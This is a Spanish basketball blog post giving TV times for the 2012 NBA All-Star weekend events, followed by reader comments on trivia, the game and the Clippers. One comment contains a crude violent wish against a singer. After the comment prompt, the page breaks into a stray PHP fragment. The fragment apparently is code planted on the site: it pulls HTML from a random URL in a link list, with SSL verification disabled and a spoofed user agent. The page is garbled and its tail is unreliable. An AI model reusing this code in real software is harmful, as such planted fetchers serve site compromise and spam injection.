Fin de semana: All-Star

24 de February de 2012 por txusma

Llegó el viernes y con él el momento de dejaros solos. Este fin de semana tenemos un menú muy especial, el All Stars que se celebra en Orlando a partir de esta misma noche. A las 03h00 tenemos el Rising Star Challenge, este nuevo invento donde 2 equipos formados indistintamente por jugadores de primer y segundo año se enfrentan en un sucedáneo de partido. Poco interés si nos hemos de fijar en anteriores ediciones. Si algún tipo de emoción tiene es la de ver a Ricky Rubio.

Mañana a las 02h30 dan comienzo los concursos. El primero será el Haier Shotting Stars en el que 4 equipos formados por 3 integrantes (un jugador en activo, una jugadora del equipo de la WNBA y un veterano) se enfrentan a ver cual de ellos es capaz de anotar desde tiro libre, triple y medio campo en menos tiempo. Después vendrá el concurso de habilidades, un simple entremés de los concursos principales. A eso de las 3h40 empezará el Foot Locker Three-Point Contest con Kevin Durant con ganas de sacarse la espina del año pasado, Anthony Morrow homenajeando a Drazen Petrovic, Kevin Love, Ryan Anderson y Mario Chalmers. Y a las 4h20, aproximadamente, el plato fuerte, aunque este año no tiene muy buena pinta a priori. Chase Budinger, Derrick Williams, Paul George y Jeremy Evans se enfrentan en el Sprite Slam Dunk.

Finalmente, el domingo a la 1h30 comienza el All Star Game aunque ¡cuidado! porque Cuatro ha decidido priorizar ‘Cuarto Milenio’ y ofrecerá el partido a partir de las 03h00 en diferido.

Por cierto, si no queréis madrugar tanto el canal Energy ofrecerá todos los eventos a las 16h00 de la tarde del sábado, el domingo y el lunes.

Y aquí os dejamos. Seguro que alguno de estos días novemos por aquí para comentar. ¡Buen fin de semana, noctámbulos!

Comenta

65 comentarios a esta entrada

  1. Blade Petrovic dice:
    #1

    Correcto Jorge gonzález que murió el año pasado.Acertó Pop. Manute podria ser correcto pero el giant tuvo un gran impacto en america.No se si sabreis lo que es la WWE pero alli trabajava Jorge Gonzalez llegando a participar en Wrestelmania evento al que van cada año 80000 personas

      Citar

  2. Blade Petrovic dice:
    #2

    Lo sabias o lo as buscado en San google

      Citar

  3. Blade Petrovic dice:
    #3

    A los demas.Conociaias este caso?

      Citar

  4. Sancho88 dice:
    #4

    Ale, por seguir con este trivial improvisado, yo voy a hacer mi pregunta, ya que jamás acertaré una de las que ponéis, porque no da tiempo, y tengo ganas de hacerla.

    ¿Qué tienen en común Joakim Noah, el máximo anotador de Palencia Baloncesto, y el ala-pívot titular de Tarragona Bàsquet 20017? Ale, un sugus pa’ quien lo acierte, jeje. Yo me la sé, lógicamente. O eso creo, jajaajaj

      Citar

  5. Blade Petrovic dice:
    #5

    Sancho sabías la mia?

      Citar

  6. Blade Petrovic dice:
    #6

    Que estudiaron en Florida.? el del alencia es ese tal Adrian Moss el articulo de la Wiki se lo has hecho tu?

      Citar

  7. AndiD dice:
    #7

    Nacho… ESPECTACULAR!! Cómo me he reído, xD

    Sobre el gigante González, creo recordar que salió un pequeño reportaje en la M Roja hace un par de años. Yo lo conocí ahí.
    Eso sí, como el verdadero gigante de la WWF no habrá ninguno: “André el gigante”. Su actuación en la princesa prometida es memorable 😀

      Citar

  8. Blade Petrovic dice:
    #8

    Ahora hay uno que no le llega a de “giant” ni a los talones se dedica a manchar su nombre como the big Show.No se pq hablo de esto en un blog de basquet.Sera el all star Stern Dimision Melo presidente

      Citar

  9. Sancho88 dice:
    #9

    Blade Petrovic:
    Que estudiaron en Florida.? el del alencia es ese tal Adrian Moss el articulo de la Wiki se lo has hecho tu?

    No conocía lo de González. Exótica historia, cuanto menos. Y más o menos vas por buen camino con lo que has respondido, pero no es del todo exacto. Si puedes concretar más…

      Citar

  10. Uno cualquiera dice:
    #10

    jajajajajaja enorme Nacho, especialmente la última pregunta. Ahora mismo está agazapado en algún lugar dónde nos puede ver (pero nosotros no a él) esperando su momento para volver.

      Citar

  11. Cocinitas dice:
    #11

    Vaya fin de semana, que vuelvan los partidos ya. Bueno el último cuarto del partido no estuvo mal. MVP para Kevin Durant y triple doble de Wade. Lebron la volvio a cagar en los últimos segundos con bola para ganar el partido.

    P.D. Los franceses han arrasado en los Oscars. Lo dicho un asco de fin de semana.

      Citar

  12. Sancho88 dice:
    #12

    Creo que hemos tenido en general un finde depre por la página eh? ni siquiera os ha levantado el ánimo Pitbull con sus…. dale, y sus ya tu sabe?? Jeje… Yo solo me he motivado cuando ha salido Chris Brown, pensando en que me encantaría meterle un destornillador por el aujerillo del pito por lo que le hizo a Rihanna en su momentol. Menudo pelotudo

      Citar

  13. Sancho88 dice:
    #13

    Bobby Simmons vuelve a los Clippers. Contrato de 10 días, para ver cómo está. Allí hizo algo en su momento… pero parece una medida muy desesperada, como lo de Martin. Lo de Billups les ha jodido todo el planteamiento de temporada. Ya dijimos por aquí a principio de temporada que podía mutar a combo guard, jugando buenos minutos como escolta tirador debido a su buena mano. Realmente, junto al irregular Mo Williams, era la única amenaza exterior. Butler ni está, ni se le espera, me temo. Casi confío más en Randy Foye que en él. Ahora mismo, Clippers generan mucha desconfianza con respecto a su comienzo de temporada. Tengo muchas dudas de que puedan alcanzar la final de conferencia, y de ser así, en estos momentos Durant, Westbrook y compañía se los merendarían fácilmente. Creo que la final ahora mismo parece clara entre Heat y Thunder, veremos como va evolucionando la segunda parte de temporada

      Citar

  14. nba dice:
    #14

    Los unicos que creo que pueden toser a los Thunder en el Oeste, son los ositos, ya que tienen fortalezas donde thunder son un poco mas debiles y donde los thunder son mas fuertes(WestBrook-Harden-Durant) tienen gente que pueden limitar su produccion(conley-Allen-Mayo-Gay)

      Citar

  15. Sancho88 dice:
    #15

    Todo dependerá de como vuelva Randolph, pero a priori, sí que van a ser un hueso duro. Y ojo a los Spurs, aunque a series largas de 7 partidos, ya se vio el año pasado que llegan justitos de fuerzas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>